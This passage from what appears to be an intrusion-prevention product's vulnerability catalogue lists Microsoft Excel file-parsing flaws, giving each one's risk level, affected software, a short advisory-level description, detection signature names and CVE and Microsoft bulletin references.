Description: A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to the way the vulnerable product parses Excel documents that contain malformed ADO Objects, allowing for memory corruption. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
References:
CVE-2010-1253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1253
BID-40531
http://www.securityfocus.com/bid/40531
OSVDB-65228
http://www.osvdb.org/65228
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Office Excel
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Open XML File Format Converter
Type: Integer Overflow
Description: A integer overflow vulnerability exists in Microsoft Excel products. The vulnerability is due to improper parsing of an Excel file that includes a malformed object. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: HTTP_SS-Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
File-OLE_Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
References:
CVE-2009-0561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0561
BID-35245
http://www.securityfocus.com/bid/35245
OSVDB-54957
http://www.osvdb.org/54957
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Input Validation
Description: Improper parsing of Excel data with a malformed Note record causes a vulnerability in Microsoft Excel. A successful exploit may cause an information disclosure.
Situation: File-OLE_Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure
References:
CVE-2019-1110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1110
Back to top

Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An use-after-free vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to improper handling of malformed files. A remote attacker could exploit this vulnerability by enticing a target user in to opening a crafted file. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the user running the vulnerable application.
Situation: File-Text_Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free
References:
CVE-2023-36041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36041
ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov
Back to top

Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office Compatibility Pack; Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel products. The vulnerability is due to improper parsing of crafted OBJ records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In a successful attack scenario, the behavior of the target depends on the intention of the malicious code. In an unsuccessful attack, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: File-OLE_Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption
References:
CVE-2008-4264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4264
BID-32621
http://www.securityfocus.com/bid/32621
MS08-074
http://technet.microsoft.com/security/bulletin/MS08-074
Back to top

Microsoft-Office-Excel-Formula-Record-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to an error while processing ptg tokens within Formula records in Excel files. This vulnerability can be exploited by enticing a user to open a maliciously crafted Excel file. Successful exploitation will result in the execution arbitrary code in the context of the logged in user, unsuccessful exploitation may cause the program to terminate abnormally.
Situation: File-OLE_Microsoft-Office-Excel-Formula-Record-Code-Execution
References:
CVE-2010-3235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3235
MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080
Back to top

Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An arbitrary free vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to improper handling of malformed files. A remote attacker could exploit this vulnerability by enticing a target user in to opening a crafted file. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the user running the vulnerable application.
Situation: File-Text_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
File-TextId_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
References:
CVE-2023-32029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32029
ms23-jun
http://technet.microsoft.com/security/bulletin/ms23-jun
Back to top

Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2002; Microsoft Office 2004; Microsoft Office XP
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Office Excel products. The vulnerability is due to improper parsing of an Excel file that includes a malformed HFPicture record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: HTTP_SS-Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
File-OLE_Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
References:
CVE-2010-1248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1248
BID-40526
http://www.securityfocus.com/bid/40526
OSVDB-65235
http://www.osvdb.org/65235
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Excel
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office; Microsoft Open XML File Format Converter; Microsoft Office
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office Excel products. The vulnerability is due to an array-indexing error when processing certain records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: File-OLE_Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption
References:
CVE-2009-0558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558
BID-35242
http://www.securityfocus.com/bid/35242
OSVDB-54954
http://www.osvdb.org/54954
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel Viewer
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Excel products. The vulnerability is due to improper parsing of crafted OBJ records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: HTTP_SS-Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
References:
CVE-2009-0557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0557
BID-35241
http://www.securityfocus.com/bid/35241
OSVDB-54953
http://www.osvdb.org/54953
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-Malformed-Record-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Compatibility Pack
Risk: Moderate
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office Excel products. The vulnerability is due to manipulation of pointer values stored in record types Qsir. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: HTTP_SS-Microsoft-Excel-Malformed-Record-Memory-Corruption
File-OLE_Microsoft-Excel-Malformed-Record-Memory-Corruption
References:
CVE-2009-1134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1134
BID-35246
http://www.securityfocus.com/bid/35246
OSVDB-54958
http://www.osvdb.org/54958
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow

About this vulnerability: Microsoft Office Excel Malformed Records Stack Buffer Overflow
Risk: High
First detected in: sgpkg-ips-225-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Office Excel products. The vulnerability is due to improper parsing of an Excel file that includes a malformed set of records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: HTTP_SS-Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
File-OLE_Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
References:
CVE-2009-0559
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0559
BID-35243
http://www.securityfocus.com/bid/35243
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-328-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: E-Mail_BS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
HTTP_SS-Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
File-OLE_Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
References:
CVE-2010-2562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2562
MS10-057
http://technet.microsoft.com/security/bulletin/MS10-057
Back to top

Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822

About this vulnerability: A buffer overflow vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Office
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Excel.
Situation: E-Mail_BS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
HTTP_SS-Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
File-OLE_Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
References:
CVE-2010-0822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0822
BID-40520
http://www.securityfocus.com/bid/40520
OSVDB-65236
http://www.osvdb.org/65236
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Object-Record-Corruption

About this vulnerability: Microsoft Office Excel Object Record Corruption vulnerability
Risk: High
First detected in: sgpkg-ips-248-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: E-Mail_BS-Microsoft-Office-Excel-Object-Record-Corruption
HTTP_SS-Microsoft-Office-Excel-Object-Record-Corruption
File-OLE_Microsoft-Office-Excel-Object-Record-Corruption
References:
CVE-2009-0557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0557
BID-35241
http://www.securityfocus.com/bid/35241
OSVDB-54953
http://www.osvdb.org/54953
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Excel. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-OLE_Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption
References:
CVE-2010-3231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3231
BID-43647
http://www.securityfocus.com/bid/43647
MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080
Back to top

Microsoft-Office-Excel-Publisher-Record-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of an Excel file that includes a malformed Publisher record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: File-OLE_Microsoft-Office-Excel-Publisher-Record-Memory-Corruption
References:
CVE-2010-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1250
BID-40528
http://www.securityfocus.com/bid/40528
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Excel
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Excel 2002. The vulnerability is due to the way the vulnerable product parses RealTimeData records in Excel documents, allowing for memory corruption. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
References:
CVE-2010-1247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1247
BID-40525
http://www.securityfocus.com/bid/40525
OSVDB-65237
http://www.osvdb.org/65237
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel Viewer
Risk: Moderate
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office Excel products. The vulnerability is due to a pointer overwrite error when processing certain records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: HTTP_SS-Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
File-OLE_Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
References:
CVE-2009-0549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0549
BID-35215
http://www.securityfocus.com/bid/35215
OSVDB-54952
http://www.osvdb.org/54952
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129

About this vulnerability: Code execution vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Excel. By persuading a target user to open a malicious Microsoft Excel file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
References:
CVE-2009-3129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3129
BID-36945
http://www.securityfocus.com/bid/36945
OSVDB-59860
http://www.osvdb.org/59860
MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067
Back to top

Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134

About this vulnerability: Code execution vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Excel. By persuading a target user to open a malicious Microsoft Excel file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: E-Mail_BS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
HTTP_SS-Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
References:
CVE-2009-3134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3134
MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067
Back to top

Microsoft-Office-Excel-RTD-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-1618-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Office Excel. The vulnerability is due to a flaw while parsing specially crafted RealTimeData (RTD) records within Excel files. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate.
Situation: File-OLE_Microsoft-Office-Excel-RTD-Buffer-Overflow
References:
CVE-2010-1246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1246
BID-40524
http://www.securityfocus.com/bid/40524
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Sheet-Object-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Office Excel
Risk: High
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Excel.
Situation: File-OLE_Microsoft-Office-Excel-Sheet-Object-Type-Confusion
References:
CVE-2010-0258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0258
BID-38550
http://www.securityfocus.com/bid/38550
MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017
Back to top

Microsoft-Office-Excel-String-Variable-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office; Microsoft Office
Type: Buffer Overflow
Description: A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to an error parsing the string length in an ExternSheet record. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Office-Excel-String-Variable-Code-Execution
File-OLE_Microsoft-Office-Excel-String-Variable-Code-Execution
References:
CVE-2010-1252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1252
BID-40530
http://www.securityfocus.com/bid/40530
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Sxdb-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Excel
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Open XML File Format Converter
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office Excel. The vulnerability is due to the way Microsoft Office Excel handles Excel files containing crafted SXDB records. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Office-Excel-Sxdb-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Sxdb-Memory-Corruption
References:
CVE-2009-3127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3127
BID-36943
http://www.securityfocus.com/bid/36943
MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067
Back to top

Microsoft-Office-Excel-SxView-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Excel Viewer
Type: Malfunction
Description: Microsoft Office Excel contains a code execution vulnerability while parsing specially crafted Excel documents.
Situation: HTTP_SS-Microsoft-Office-Excel-SxView-Memory-Corruption
File-OLE_Microsoft-Office-Excel-SxView-Memory-Corruption
References:
CVE-2009-3128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3128
BID-36944
http://www.securityfocus.com/bid/36944
MS09-067
http://technet.microsoft.com/security/bulletin/MS09-067
Back to top

Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Office-Excel-SxView-SXStreamID-Memory-Corruption-CVE-2010-1245
File-OLE_Microsoft-Office-Excel-SxView-SXStreamID-CVE-2010-1245
References:
CVE-2010-1245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1245
BID-40523
http://www.securityfocus.com/bid/40523
OSVDB-65229
http://www.osvdb.org/65229
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Open XML File Format Converter; Microsoft Office; Microsoft Office Compatibility Pack
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to improper parsing of certain Excel Table records in an Excel document that leads to memory access violation and potentially allows for code execution. A remote attacker can exploit this vulnerability to execute arbitrary code in the context of the logged in user.
Situation: HTTP_SS-Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
File-OLE_Microsoft-Office-Excel-Table-Record-Parsing-Code-Execution
References:
CVE-2010-3232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3232
BID-43646
http://www.securityfocus.com/bid/43646
MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080
Back to top

Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Excel
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Open XML File Format Converter; Microsoft Office Compatibility Pack
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office Excel products.
Situation: HTTP_SS-Microsoft-Office-Excel-Unexpected-Field-Value-Handling-Memory-Corruption
File-OLE_Microsoft-Office-Excel-Unexpected-Field-Value-Memory-Corruption
References:
CVE-2009-0560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0560
BID-35244
http://www.securityfocus.com/bid/35244
OSVDB-54956
http://www.osvdb.org/54956
MS09-021
http://technet.microsoft.com/security/bulletin/MS09-021
Back to top

Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Platform: Generic
Software: Microsoft Excel
Type: Malfunction
Description: An out-of-bounds write vulnerability has been reported in Microsoft Office Excel. The vulnerability is due to improper handling of malformed files. A remote attacker could exploit this vulnerability by enticing a target user in to opening a crafted file. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of the user running the vulnerable application.
Situation: File-Text_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
File-TextId_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
References:
CVE-2023-33133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33133
ms23-jun
http://technet.microsoft.com/security/bulletin/ms23-jun
Back to top

Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: E-Mail_BS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
HTTP_SS-Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
File-OLE_Microsoft-Office-Excel-WOpt-Record-Memory-Corruption-CVE-2010-0824
References:
CVE-2010-0824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0824
BID-40522
http://www.securityfocus.com/bid/40522
OSVDB-65231
http://www.osvdb.org/65231
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Office-Excel-WorksheetOptions-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
